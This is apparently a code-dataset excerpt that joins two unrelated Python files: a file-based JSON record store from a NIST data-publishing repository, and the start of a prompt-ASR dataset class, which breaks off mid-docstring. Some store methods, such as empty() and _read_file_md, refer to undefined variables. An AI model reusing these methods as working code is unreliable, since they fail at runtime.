FSBasedNonFileComps(FSBasedObjectList, NERDNonFileComps):\n \"\"\"\n an file-based implementation of the NERDNonFileComps interface\n \"\"\"\n _pfx = \"cmp\"\n def __init__(self, resource: NERDResource, nfcmpdir: str):\n FSBasedObjectList.__init__(self, resource, nfcmpdir)\n\n def load_nonfile_components(self, cmps: Iterable[Mapping]) -> int:\n for cmp in cmps:\n if 'filepath' not in cmp:\n # any more validity checking?\n self.append(cmp)\n\n\nclass FSBasedFileComps(NERDFileComps):\n \"\"\"\n an file-based implementation of the NERDFileComps interface\n \"\"\"\n _pfx = \"file\"\n _chldfile = \"_children.json\"\n _seqfile = \"_seq.json\"\n \n def __init__(self, resource: NERDResource, filedir: str, iscollf=None):\n super(FSBasedFileComps, self).__init__(resource, iscollf)\n self._dir = Path(filedir)\n if not self._dir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(filedir))\n self._chldp = self._dir / self._chldfile # map: top-level file names to their IDs\n self._seqp = self._dir / self._seqfile # the path where the next sequence is cached\n self._nxtseq = self._read_next_seq() # the next available sequence # for assigned IDs\n self._children = self._read_toplevel_files() # the files at the top of the hierarchy\n\n def _read_next_seq(self):\n nxt = 0\n if self._seqp.is_file():\n try:\n nxt = read_json(self._seqp)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n if not isinstance(nxt, int):\n raise StorageFormatException(\"%s: ID sequence file does not contain an integer\")\n\n return nxt\n\n # identifiers and sequence numbers\n #\n def _cache_next_seq(self, nxt: int = None):\n if nxt is None:\n nxt = self._nxtseq\n try:\n write_json(nxt, self._seqp)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write ID sequence file: %s\"\n % (str(self._seqp), str(ex))) \n\n def _new_id(self):\n out = \"%s_%d\" % (self._pfx, self._nxtseq)\n nxt = self._nxtseq + 1\n self._cache_next_seq(nxt)\n self._nxtseq = nxt\n return out\n\n def _reserve_id(self, id):\n m = _idre.search(id)\n if m:\n # the id was set by a previous call to this class's minter\n # extract the number to ensure future ids are unique\n n = int(m.group(1))\n if n >= self._nxtseq:\n self._nxtseq = n + 1\n self._cache_next_seq()\n\n # self._children: the contents of the implicit, top-level collection\n #\n def _cache_children(self, children=None):\n if children is None:\n children = self._children\n try:\n write_json(children, str(self._chldp))\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write top collection data: %s\"\n % (str(self._chldp), str(ex))) \n\n def _read_toplevel_files(self):\n if not self._chldp.exists():\n # child listing file, yet; create one based on the directory contents\n children = OrderedDict(self._discover_toplevel_files())\n self._cache_children(children)\n\n else:\n try:\n children = read_json(str(self._chldp))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: failed to load JSON data: %s\"\n % (str(self._chldp), str(ex)))\n if not isinstance(children, OrderedDict) or \\\n any([not isinstance(v, str) for v in children.values()]):\n raise StorageFormatException(\"%s: does not contain a name-id map\")\n\n return children\n\n def _discover_toplevel_files(self):\n failed = []\n found = []\n for jf in os.listdir(self._dir):\n if jf.endswith(\".json\") and not jf.startswith(\".\") and not jf.startswith(\"_\"):\n found.append(jf)\n try:\n md = read_json(str(self._dir / jf))\n except (ValueError, IOError) as ex:\n failed.append(jf)\n if '/' not in md.get('filepath', '/'):\n id = md.get('@id')\n if not id:\n id = os.path.splitext(md['filepath'])[0]\n yield (md['filepath'], id)\n\n # find file metadata\n #\n def _fmd_file(self, id, is_coll: bool):\n id = id.replace(os.sep,'::')\n pfx = \"c:\" if is_coll else \"f:\"\n return self._dir / (pfx + id + \".json\")\n\n def _is_coll_mdfile(self, mdfile: Path):\n if not mdfile:\n return False\n return mdfile.name.startswith(\"c:\")\n\n def _find_fmd_file(self, id):\n loc = self._fmd_file(id, False)\n if not loc.exists():\n loc = self._fmd_file(id, True)\n if not loc.exists():\n loc = None\n return loc\n\n def exists(self, id: str) -> bool:\n return bool(self._find_fmd_file(id))\n\n def get_file_by_id(self, id: str) -> Mapping:\n return self._export_file(self._get_file_by_id(id))\n\n def _get_file_by_id(self, id: str) -> Mapping:\n mdf = self._find_fmd_file(id)\n if not mdf:\n raise ObjectNotFound(id)\n return self._read_file_md(mdf)\n\n def _read_file_md(self, mdfile: Path) -> Mapping:\n try:\n return read_json(str(mdfile))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file metadata as JSON: %s\" \n % (str(mdf), str(ex)))\n\n def _export_file(self, fmd):\n out = OrderedDict([m for m in fmd.items() if not m[0].startswith(\"__\")])\n if self.is_collection(out):\n out['has_member'] = [OrderedDict([('@id', m[1]), ('name', m[0])])\n for m in fmd.get(\"__children\",{}).items()]\n return out\n\n def get_file_by_path(self, path: str) -> Mapping:\n if not path:\n raise ValueError(\"get_file__path(): No path specified\")\n return self._export_file(self._get_file_by_path(path))\n \n def _get_file_by_path(self, path: str) -> Mapping:\n return self._get_file_by_id(self._find_fmd_id_by_path(path))\n\n def _find_fmd_id_by_path(self, path: str) -> str:\n return self._find_fmd_id_by_relpath(self._children, path.split('/'), path)\n\n def _find_fmd_id_by_relpath(self, children: Mapping, steps: [str], origpath):\n top = steps.pop(0)\n if top not in children:\n raise ObjectNotFound(origpath)\n\n if not steps:\n return children[top]\n\n mdf = self._find_fmd_file(children[top])\n if not self._is_coll_mdfile(mdf):\n raise ObjectNotFound(origpath)\n fmd = self._read_file_md(mdf)\n\n return self._find_fmd_id_by_relpath(fmd.get(\"__children\", {}), steps, origpath)\n\n def path_exists(self, filepath) -> bool:\n try:\n return self.exists(self._find_fmd_id_by_path(filepath))\n except ObjectNotFound:\n return False\n\n def path_is_collection(self, filepath) -> bool:\n try:\n id = self._find_fmd_id_by_path(filepath)\n if not id:\n return False\n return self._is_coll_mdfile(self._find_fmd_file(id))\n except ObjectNotFound:\n return False\n\n def get_ids_in_subcoll(self, collpath: str) -> [str]:\n children = self._children\n if collpath != \"\":\n try:\n coll = self._get_file_by_path(collpath)\n except ObjectNotFound:\n return []\n else:\n children = coll.get('__children', [])\n\n return list(children.values())\n\n def get_subcoll_members(self, collpath: str) -> Iterator[Mapping]:\n for id in self.get_ids_in_subcoll(collpath):\n yield self.get_file_by_id(id)\n\n @property\n def ids(self):\n return list(self.iter_ids())\n\n def iter_ids(self):\n return iter(self._IDIterator(self))\n\n class _IDIterator:\n def __init__(self, fstore, children=None):\n self._fs = fstore\n if children is None:\n children = list(fstore._children.values())\n self.descendents = children\n def __iter__(self):\n return self\n def __next__(self):\n if self.descendents:\n desc = self.descendents.pop(0)\n mdf = self._fs._find_fmd_file(desc)\n if mdf and self._fs._is_coll_mdfile(mdf):\n descmd = self._fs._read_file_md(mdf)\n if descmd.get('__children'):\n self.descendents.extend(descmd.get('__children', {}).values())\n return desc\n raise StopIteration()\n\n def iter_files(self):\n for id in self.iter_ids():\n yield self.get_file_by_id(id)\n\n # manipulate files (via their metadata\n #\n def _cache_file_md(self, fmd):\n fmdf = self._fmd_file(fmd['@id'], self.is_collection(fmd))\n try:\n write_json(fmd, fmdf)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write file metadata: %s\" % (str(fmdf), str(ex)))\n\n def _import_file(self, fmd: Mapping, filepath: str=None, id: str=None, astype=None):\n # Copy and convert the file metadata into the form that is held internally\n out = OrderedDict([copy.deepcopy(m) for m in fmd.items() if m[0] != 'has_member'])\n if filepath:\n out['filepath'] = filepath\n if id:\n out['@id'] = id\n if astype:\n if isinstance(astype, str):\n astype = [astype]\n if isinstance(astype, (tuple, list)):\n out['@type'] = list(astype)\n\n if out.get('@id'):\n self._reserve_id(out['@id'])\n else:\n out['@id'] = self._new_id()\n\n if not out.get('filepath'):\n # Missing a filepath (avoid this); set to default\n out['filepath'] = self._basename(out['@id'])\n\n if not out.get('@type'):\n # Assume that this should be a regular file\n out['@type'] = [DATAFILE_TYPE, DOWNLOADABLEFILE_TYPE]\n \n # if self.is_collection(fmd) and 'has_member' in fmd:\n # # convert 'has_member' to '__children'\n # out['__children'] = OrderedDict()\n # for child in fmd['has_member']:\n # if '@id' in child and 'filepath' in child:\n # out['__children'][self._basename(child['filepath'])] = child['@id']\n return out\n\n def set_file_at(self, md, filepath: str=None, id=None, as_coll: bool=None) -> str:\n \"\"\"\n add or update a file component. If `id` is given (or otherwise included in the metadata as \n the `@id` property) and it already exists in the file list, its metadata will be replaced\n with the data provided; if it does not exist, then the `filepath` will be used to locate and \n update an existing file. If a file matching either the `id` nor the `filepath` does not exist,\n a new file is added with the given file path (or with the path given in the metadata); if the \n file does not have an identifier, a new one will be assigned. If the previously existing file\n with the given identifier has a file path different from the given `filepath`; the file component \n will be effectively moved to that file with the new metadata. \n \"\"\"\n # first, make sure we have both an id and a filepath for the input metadata\n if not id:\n id = md.get('@id')\n oldfile = None\n if id:\n try:\n oldfile = self._get_file_by_id(id)\n except ObjectNotFound:\n pass\n\n if not filepath:\n filepath = md.get('filepath')\n if not filepath and oldfile:\n filepath = oldfile.get('filepath')\n if not filepath:\n raise ValueError(\"set_file_at(): filepath must be provided\")\n\n destfile = None\n try:\n destfile = self._get_file_by_path(filepath)\n except ObjectNotFound:\n pass\n if not oldfile:\n oldfile = destfile\n\n if oldfile and not id:\n id = oldfile.get('@id')\n\n as_coll = [SUBCOLL_TYPE] if as_coll is True else None\n\n md = self._import_file(md, filepath, id, as_coll) # assigns an @id if needed\n\n # Note: at this point,\n # oldfile = existing file with same id as md\n # destfile = existing file with same filepath as md\n\n # ensure the parent collection exists\n if '/' in filepath and not self.path_is_collection(self._dirname(filepath)):\n raise ObjectNotFound(self._dirname(filepath))\n\n # Are we \"writing over\" an existing file?\n deldestfile = False\n if destfile and \\\n (destfile['@id'] != md['@id'] or self.is_collection(destfile) != self.is_collection(md)):\n if destfile.get('__children'):\n # destination is a non-empty collection: won't clobber it\n raise CollectionRemovalDissallowed(destfile['filepath'], \"collection is not empty\")\n deldestfile = True\n\n if oldfile:\n if self.is_collection(oldfile) and self.is_collection(md):\n # updating a collection; preserve its contents\n md['__children'] = oldfile.get('__children')\n if md['__children'] is None:\n md['__children'] = OrderedDict()\n\n if filepath != oldfile.get('filepath'):\n # this is a file move; deregister it from its old parent\n self._deregister_from_parent(oldfile['filepath'])\n\n # save this record\n self._cache_file_md(md)\n\n if deldestfile:\n # delete the old destination file\n mdf = self._find_fmd_file(destfile['@id'])\n if mdf:\n mdf.unlink()\n\n # register the new file with its parent\n self._register_with_parent(md['filepath'], md['@id'])\n\n return md['@id']\n\n def _register_with_parent(self, filepath, id):\n if '/' in filepath:\n parent = self._get_file_by_path(self._dirname(filepath))\n name = self._basename(filepath)\n if not self.is_collection(parent):\n raise ObjectNotFound(parent, message=self._dirname(filepath)+\": Not a subcollection\")\n if '__children' not in parent:\n parent['__children'] = OrderedDict()\n parent['__children'][name] = id\n self._cache_file_md(parent)\n\n else:\n self._children[filepath] = id\n self._cache_children()\n\n def _deregister_from_parent(self, filepath):\n if '/' in filepath:\n try:\n parent = self._get_file_by_path(self._dirname(filepath))\n name = self._basename(filepath)\n if name in parent.get('__children',{}):\n del parent['__children'][name]\n self._cache_file_md(parent)\n except ObjectNotFound:\n pass\n else:\n if filepath in self._children:\n del self._children[filepath]\n self._cache_children()\n\n def load_file_components(self, cmps):\n # Note that this implementation makes no assumptions about what order the components\n # appear in.\n \n # Once through to load all files by their ID\n for cmp in cmps:\n if cmp.get('filepath'):\n if cmp.get('@id'):\n self._reserve_id(cmp.get('@id'))\n self.set_file_at(cmp, cmp['filepath'], cmp['@id'])\n\n # Go through again to (1) assign ids to file components that are missing one,\n # and (2) create a map from parent subcollections to their children\n children = {'': []}\n saved = set()\n subcolls = []\n for cmp in cmps:\n if cmp.get('filepath'):\n id = cmp.get('@id')\n if not id:\n # assign an ID to file component missing one\n id = self.set_file_at(cmp, cmp['filepath'])\n\n # build parent-children map\n if '/' in cmp['filepath']:\n parent= self._dirname(cmp['filepath'])\n if parent not in children:\n children[parent] = []\n children[parent].append( (self._basename(cmp['filepath']), id) )\n else:\n children[''].append( (cmp['filepath'], id) )\n self._children[cmp['filepath']] = id\n\n saved.add(id)\n\n # remember subcollections\n if self.is_collection(cmp):\n cmp['@id'] = id\n subcolls.append(cmp)\n\n # Go through a last time to set the subcollection content info into each subcollection component\n for cmp in subcolls:\n if cmp.get('filepath') in children:\n if '__children' not in cmp:\n cmp['__children'] = OrderedDict()\n\n # base subcollection contents first on 'has_member' list as this captures order info\n if cmp.get('has_member'):\n if isinstance(cmp.get('has_member',[]), str):\n cmp['has_member'] = [cmp['has_member']]\n for child in cmp['has_member']:\n if child.get('@id') in saved and child.get('name'):\n cmp['__children'][child['name']] = child.get('@id')\n\n # capture any that got missed by 'has_member'\n for child in children[cmp['filepath']]:\n if child[0] not in cmp['__children']:\n cmp['__children'][child[0]] = child[1]\n\n self.set_file_at(cmp)\n\n def delete_file(self, id: str) -> bool:\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"empty\")\n\n try:\n fmd = self._get_file_by_id(id)\n except ObjectNotFound:\n return False\n\n # deregister it with its parent\n self._deregister_from_parent(fmd['filepath'])\n\n # now delete the file entry\n self._find_fmd_file(id).unlink()\n return True\n\n def empty(self):\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"empty\")\n self._children = OrderedDict()\n if self._chldp.is_file():\n self._chldp.unlink()\n\n for id in os.listdir(self._dir):\n if jf.endswith(\".json\") and not jf.startswith(\".\") and not jf.startswith(\"_\"):\n if file.is_file():\n file.unlink()\n\n self._cache_children()\n\n def set_order_in_subcoll(self, collpath: str, ids: Iterable[str]) -> Iterable[str]:\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"empty\")\n children = self._children\n coll = None\n if collpath:\n coll = self._get_file_by_path(collpath)\n if not self.is_collection(coll):\n raise ObjectNotFound(collpath, message=collpath+\": not a subcollection component\")\n if '__children' not in coll:\n coll['__children'] = OrderedDict()\n children = coll['__children']\n\n # create an inverted child map\n byid = OrderedDict( [(itm[1], itm[0]) for itm in children.items()] )\n ids = list(ids)\n for id in byid:\n if id not in ids:\n ids.append(id)\n\n # reorder the original map\n children.clear()\n for id in ids:\n if id in byid:\n children[byid[id]] = id\n\n if coll:\n self._cache_file_md(coll)\n else:\n self._cache_children()\n\n\nclass FSBasedResource(NERDResource):\n \"\"\"\n a file-based implementation of the NERDResource interface in which all data are stored in JSON \n files on disk.\n \"\"\"\n\n _subprops = \"authors references components\".split()\n\n def __init__(self, id: str, storeroot: str, create: bool=True, parentlog: Logger=None):\n super(FSBasedResource, self).__init__(id, parentlog)\n storeroot = Path(storeroot)\n if not storeroot.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(storeroot))\n if not os.access(storeroot, os.R_OK|os.W_OK|os.X_OK):\n raise StorageFormatException(\"%s: directory not writeable\" % str(storeroot))\n\n self._dir = storeroot / _arkre.sub('', self.id).replace(os.sep, '::')\n self._resmdfile = self._dir / \"res.json\"\n\n self._auths = None\n self._refs = None\n self._files = None\n self._nonfiles = None\n\n if create and not self._dir.exists():\n self._create_empty()\n\n def _create_empty(self):\n if not self._dir.exists():\n self._dir.mkdir()\n self._cache_res_md({ \"@id\": self.id })\n\n @property\n def authors(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._auths:\n dir = self._dir / \"auths\"\n if not dir.exists():\n dir.mkdir()\n self._auths = FSBasedAuthorList(self, dir)\n return self._auths\n\n @property\n def references(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._refs:\n dir = self._dir / \"refs\"\n if not dir.exists():\n dir.mkdir()\n self._refs = FSBasedRefList(self, dir)\n return self._refs\n\n @property\n def nonfiles(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._nonfiles:\n dir = self._dir / \"nonfiles\"\n if not dir.exists():\n dir.mkdir()\n self._nonfiles = FSBasedNonFileComps(self, dir)\n return self._nonfiles\n\n @property\n def files(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._files:\n dir = self._dir / \"files\"\n if not dir.exists():\n dir.mkdir()\n self._files = FSBasedFileComps(self, dir)\n return self._files\n\n @property\n def deleted(self):\n return not self._dir.exists()\n\n def delete(self):\n if not self.deleted:\n self._data = None\n self._files = None\n self._nonfiles = None\n self._refs = None\n self._auths = None\n shutil.rmtree(self._dir)\n\n def _cache_res_md(self, md):\n if self.deleted:\n self._create_empty()\n try:\n write_json(md, self._resmdfile)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write file metadata: %s\"\n % (str(self._seqp), str(ex)))\n\n def replace_res_data(self, md):\n md = OrderedDict(p for p in md.items() if p[0] not in self._subprops)\n self._cache_res_md(md)\n\n def get_res_data(self) -> Mapping:\n if self.deleted:\n return None\n try:\n return read_json(self._resmdfile)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read resource metadata as JSON: %s\" \n % (str(self._resmdfile), str(ex)))\n\n def get_data(self, inclfiles=True) -> Mapping:\n out = self.get_res_data()\n if out is None:\n return None\n\n if self.authors.count > 0:\n out['authors'] = self.authors.get_data()\n if self.references.count > 0:\n out['references'] = self.references.get_data()\n if self.nonfiles.count > 0 or self.files.count > 0:\n out['components'] = []\n if self.nonfiles.count > 0:\n out['components'].extend(self.nonfiles.get_data())\n if self.files.count > 0:\n out['components'].extend(self.files.get_files())\n return out\n \n\nclass FSBasedResourceStorage(NERDResourceStorage):\n \"\"\"\n a factory for opening records stored in the JSON files on disk\n \"\"\"\n _seqfile = \"_seq.json\"\n _idre = re.compile(r'^\\w+\\d*:0*(\\d+)$')\n\n @classmethod\n def from_config(cls, config: Mapping, logger: Logger):\n \"\"\"\n an class method for creatng an FSBasedResourceStorage instance from configuration data.\n\n Recognized configuration paramters include:\n\n ``store_dir``\n (str) _required_. The root directory under which all resource data will be stored.\n ``default_shoulder``\n (str) _optional_. The shoulder that new identifiers are minted under. This is not \n normally used as direct clients of this class typically choose the shoulder on a \n per-call basis. The default is \"nrd\".\n\n :param dict config: the configuraiton for the specific type of storage\n :param Logger logger: the logger to use to capture messages\n \"\"\"\n if not config.get('store_dir'):\n raise ConfigurationException(\"Missing required configuration parameter: store_dir\")\n \n return cls(config['store_dir'], config.get(\"default_shoulder\", \"nrd\"), logger)\n \n def __init__(self, storeroot: str, newidprefix: str=\"nrd\", logger: Logger=None):\n \"\"\"\n initialize a factory with with the resource data storage rooted at a given directory\n :param str newidprefix: a prefix to use when minting new identifiers\n \"\"\"\n self._dir = Path(storeroot)\n pdir = self._dir.parents[0]\n if not pdir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(pdir))\n if not self._dir.exists():\n self._dir.mkdir()\n if not self._dir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(self._dir))\n if not os.access(self._dir, os.R_OK|os.W_OK|os.X_OK):\n raise StorageFormatException(\"%s: directory not writeable\" % str(self._dir))\n\n self._pfx = newidprefix\n self._seqp = self._dir / self._seqfile # the path where the next sequence is cached\n self._nxtseq = self._read_next_seq() # the next available sequence # for assigned IDs\n\n if not logger:\n logger = logging.getLogger(\"nerdstore\")\n self._log = logger\n\n def _new_id(self):\n out = \"{0}:{1:04d}\".format(self._pfx, self._nxtseq)\n nxt = self._nxtseq + 1\n self._cache_next_seq(nxt)\n self._nxtseq = nxt\n return out\n\n def _reserve_id(self, id):\n m = self._idre.search(_arkre.sub('', id))\n if m:\n n = int(m.group(1))\n if n >= self._nxtseq:\n self._nxtseq = n + 1\n self._cache_next_seq()\n\n def _read_next_seq(self):\n nxt = 1\n if self._seqp.is_file():\n try:\n nxt = read_json(self._seqp)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n if not isinstance(nxt, int):\n raise StorageFormatException(\"%s: ID sequence file does not contain an integer\")\n\n return nxt\n\n def _cache_next_seq(self, nxt: int = None):\n if nxt is None:\n nxt = self._nxtseq\n try:\n write_json(nxt, self._seqp)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write ID sequence file: %s\"\n % (str(self._seqp), str(ex))) \n\n def delete(self, id: str) -> bool:\n fn = self._dir / id.replace(os.sep, '::')\n if fn.is_dir():\n shutil.rmtree(fn)\n return True\n return False\n \n def open(self, id: str=None) -> NERDResource:\n if not id:\n id = self._new_id()\n return FSBasedResource(id, self._dir, True, self._log)\n \n\n def load_from(self, rec: Mapping, id: str=None):\n \"\"\"\n load a NERDm record into this storage. If the record exist\n :param Mapping rec: the NERDm Resource record to load, given as a JSON-ready dictionary\n :param str id: the ID to assign to the record; if not given, the value of the record's\n `@id` property will be used or one will be created for it.\n \"\"\"\n if not id:\n id = rec.get('@id')\n if id:\n self._reserve_id(id)\n else:\n id = self._new_id()\n\n res = self.open(id)\n res.replace_all_data(rec)\n\n def exists(self, id: str) -> bool:\n dir = self._dir / _arkre.sub('', id).replace(os.sep, \"::\")\n return dir.is_dir()\n\n\n\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/nistoar/midas/dap/nerdstore/fsbased.py","file_name":"fsbased.py","file_ext":"py","file_size_in_byte":38503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73951372906","text":"import random\nfrom typing import Callable, Dict, List, Optional, Union\n\nimport numpy as np\nimport torch\nfrom lhotse import validate\nfrom lhotse.cut import CutSet\nfrom lhotse.dataset import K2SpeechRecognitionDataset\nfrom lhotse.dataset.input_strategies import BatchIO, PrecomputedFeatures\nfrom lhotse.utils import compute_num_frames, ifnone\nfrom text_normalization import (\n lower_all_char,\n lower_only_alpha,\n remove_non_alphabetic,\n train_text_normalization,\n upper_all_char,\n upper_only_alpha,\n)\nfrom torch.utils.data.dataloader import DataLoader, default_collate\n\n\nclass PromptASRDataset(torch.utils.data.Dataset):\n \"\"\"This is a dataset for Prompt ASR. It supports the following features:\n 1. Select a tuple of (text, pre_text, style_text) randomly from a\n list of texts as supervisions.\n\n \"\"\"\n\n def __init__(\n self,\n return_cuts: bool = False,\n cut_transforms: List[Callable[[CutSet], CutSet]] = None,\n input_transforms: List[Callable[[torch.Tensor], torch.Tensor]] = None,\n input_strategy: BatchIO = PrecomputedFeatures(),\n text_sampling_func: Optional[Callable[[List[str]], str]] = None,\n rare_word_list: Optional[List[str]] = None,\n ):\n \"\"\"\n Icefall ASR IterableDataset constructor. See https://github.com/lhotse-speech/lhotse/blob/master/lhotse/dataset/speech_recognition.py\n for more details.\n\n :param return_cuts: When ``True``, will additionally return a \"cut\" field in each batch with the Cut\n objects used to create that batch.\n :param cut_transforms: A list of transforms to be applied on each sampled batch,\n before converting cuts to an input representation (audio/features).\n Examples: cut concatenation, noise cuts mixing, etc.\n :param input_transforms: A list of transforms to be applied on each sampled batch,\n after the cuts are converted to audio/features.\n Examples: normalization, SpecAugment, etc.\n :param input_strategy: Converts cuts into a collated batch of audio/features.\n By default, reads pre-computed features from disk.\n :param text_sampling_func: Sampling a text as transcription from a list of texts.\n \"\"\"\n super().__init__()\n # Initialize the fields\n self.return_cuts = return_cuts\n self.cut_transforms = ifnone(cut_transforms, [])\n self.input_transforms = ifnone(input_transforms, [])\n self.input_strategy = input_strategy\n\n # a text sampling function\n self.text_sampling_func = text_sampling_func\n self.rare_word_list = rare_word_list\n\n def __getitem__(self, cuts: CutSet) -> Dict[str, Union[torch.Tensor, List[str]]]:\n \"\"\"\n Return a new batch, with the batch size automatically determined using the constraints\n of max_frames and max_cuts.\n \"\"\"\n validate_for_asr(cuts)\n\n # Sort the cuts by duration so that the first one determines the batch time dimensions.\n cuts = cuts.sort_by_duration(ascending=False)\n\n # Optional CutSet transforms - e.g. padding, or speed perturbation that adjusts\n # the supervision boundaries.\n for tnfm in self.cut_transforms:\n cuts = tnfm(cuts)\n\n # Sort the cuts again after transforms\n cuts = cuts.sort_by_duration(ascending=False)\n\n # Get a tensor with batched feature matrices, shape (B, T, F)\n # Collation performs auto-padding, if necessary.\n input_tpl = self.input_strategy(cuts)\n if len(input_tpl) == 3:\n # An input strategy with fault tolerant audio reading mode.\n # \"cuts\" may be a subset of the original \"cuts\" variable,\n # that only has cuts for which we succesfully read the audio.\n inputs, _, cuts = input_tpl\n else:\n inputs, _ = input_tpl\n\n # Get a dict of tensors that encode the positional information about supervisions\n # in the batch of feature matrices. The tensors are named \"sequence_idx\",\n # \"start_frame/sample\" and \"num_frames/samples\".\n supervision_intervals = self.input_strategy.supervision_intervals(cuts)\n\n # Apply all available transforms on the inputs, i.e. either audio or features.\n # This could be feature extraction, global MVN, SpecAugment, etc.\n segments = torch.stack(list(supervision_intervals.values()), dim=1)\n for tnfm in self.input_transforms:\n inputs = tnfm(inputs, supervision_segments=segments)\n\n batch = {\n \"inputs\": inputs,\n \"supervisions\": default_collate(\n [\n self.text_sampling_func(\n texts=supervision.texts,\n pre_texts=supervision.pre_texts,\n context_list=supervision.context_list\n if \"context_list\" in supervision.custom\n else None,\n rare_word_list=self.rare_word_list,\n )\n if self.text_sampling_func is not None\n else {\n \"text\": train_text_normalization(supervision.texts[0]),\n \"pre_text\": train_text_normalization(supervision.pre_texts[0]),\n \"style_text\": train_text_normalization(\n supervision.pre_texts[0]\n ),\n \"transform_ids\": 0,\n }\n for sequence_idx, cut in enumerate(cuts)\n for supervision in cut.supervisions\n ]\n ),\n }\n # Update the 'supervisions' field with sequence_idx and start/num frames/samples\n batch[\"supervisions\"].update(supervision_intervals)\n if self.return_cuts:\n batch[\"supervisions\"][\"cut\"] = [\n cut for cut in cuts for sup in cut.supervisions\n ]\n\n has_word_alignments = all(\n s.alignment is not None and \"word\" in s.alignment\n for c in cuts\n for s in c.supervisions\n )\n\n return batch\n\n\ndef validate_for_asr(cuts: CutSet) -> None:\n validate(cuts)\n tol = 2e-3 # 1ms\n for cut in cuts:\n for supervision in cut.supervisions:\n assert supervision.start >= -tol, (\n f\"Supervisions starting before the cut are not supported for ASR\"\n f\" (sup id: {supervision.id}, cut id: {cut.id})\"\n )\n\n # Supervision start time is relative to Cut ...\n # https://lhotse.readthedocs.io/en/v0.10_e/cuts.html\n #\n # 'supervision.end' is end of supervision inside the Cut\n assert supervision.end <= cut.duration + tol, (\n f\"Supervisions ending after the cut \"\n f\"are not supported for ASR\"\n f\" (sup id: {supervision.id}, cut id: {cut.id})\"\n )\n\n\ndef get_substring(s: str, min_len: int = 40, max_len: int = 250) -> str:\n \"\"\"A helper function that generates a random substring from a given string\n\n Args:\n s (str): Input string\n\n Returns:\n str: Returned substring\n \"\"\"\n min_len = min(len(s), min_len)\n\n start = random.randint(0, len(s) - min_len)\n end = min(start + max_len, random.randint(start + min_len, len(s)))\n\n return s[start:end]\n\n\ndef triplet_text_sampling(\n texts: List[str],\n pre_texts: List[str],\n context_list: Optional[str] = None,\n rare_word_list: Optional[List[str]] = None,\n transforms: Optional[List[Callable[[str], str]]] = None,\n min_len_style: Optional[int] = 80,\n) -> Dict[str, str]:\n \"\"\"This function generates a triplet of\n (pre_text, style_text, ref_text). The style of style_text and ref_text\n should **always** match, whereas the style of pre_text is arbitrary.\n Suppose we have 2 different transforms A,B, and the preceding text is\n referred to as pre_text. The following three tuples are all valid:\n\n (A(pre_text), A(style_text), A(ref_text))\n (A(pre_text), B(style_text), B(ref_text))\n (A(pre_text), A(style_text), A(ref_text))\n (B(pre_text), B(style_text), B(ref_text))\n\n If transforms is not given, the following pre-defined transforms\n are available:\n 0: original (mixed-cased, with punc)\n 1: upper_only_alpha (upper-cased, no punc)\n\n When the transform of text and pre_text match, we can use the whole\n pre_text as the prompt text.\n\n Args:\n texts (List[str]):\n A list of ref_texts whose first item is the ground truth\n text from books.\n pre_texts (List[str]):\n A list of pre_texts, whose first item is the groundtruth\n pre_text from books.\n context_list: Optional[str] = None,\n A list of biasing words separated by space\n rare_word_list: Optional[str] = None,\n A list of rare-words separated by space (used as distractors)\n transforms (List[Callable[[str], str]]): A list of possible transforms to be applied\n\n Returns:\n A dictionary of ref_text, pre_text, style_text\n \"\"\"\n assert len(texts) == len(pre_texts)\n assert len(texts) == 2\n\n # we assume the first item to be ground truth\n gt_text = texts[0]\n gt_pre_text = pre_texts[0]\n\n if transforms is None:\n transforms = [\n lambda x: x, # return it self\n upper_only_alpha,\n lower_only_alpha,\n lower_all_char,\n ]\n\n sampling_weight = [\n 0.7,\n 0.3,\n 0.0,\n 0.0,\n ] # Mixed-punc should have the largest sampling prob\n\n total_transforms = len(transforms) # do not use the recognized trans\n\n # Randomly sample transforms\n i_text, i_pre_text = np.random.choice(total_transforms, 2, p=sampling_weight)\n\n # get the normalized text and pre_text\n text = transforms[i_text](gt_text)\n pre_text = transforms[i_pre_text](gt_pre_text)\n\n if i_text == i_pre_text:\n style_text = get_substring(pre_text, min_len=min_len_style, max_len=150)\n else:\n # get the pre_text of same style as text\n # For now, **don't** do transform to the style text, because we do it after the dataloader\n style_text = gt_pre_text\n # style_text = pre_texts[i_text] if i_text <= 1 else transforms[i_text-2](gt_pre_text)\n style_text = get_substring(style_text, min_len=min_len_style, max_len=150)\n\n return {\n \"text\": train_text_normalization(text),\n \"pre_text\": train_text_normalization(pre_text),\n \"style_text\": train_text_normalization(style_text),\n \"transform_ids\": i_text,\n }\n\n\ndef triplet_text_sampling_with_context_list(\n texts: List[str],\n pre_texts: List[str],\n context_list: str,\n rare_word_list: List[str],\n transforms: Optional[List[Callable[[str], str]]] = None,\n min_len_style: Optional[int] = 80,\n) -> Dict[str, str]:\n \"\"\"This function generates a triplet of\n (pre_text, style_text, ref_text). The pre_text is either the preceding text\n or a list of words (context words + distractors).\n The style of style_text and ref_text should **always** match, whereas\n the style of pre_text is arbitrary.\n 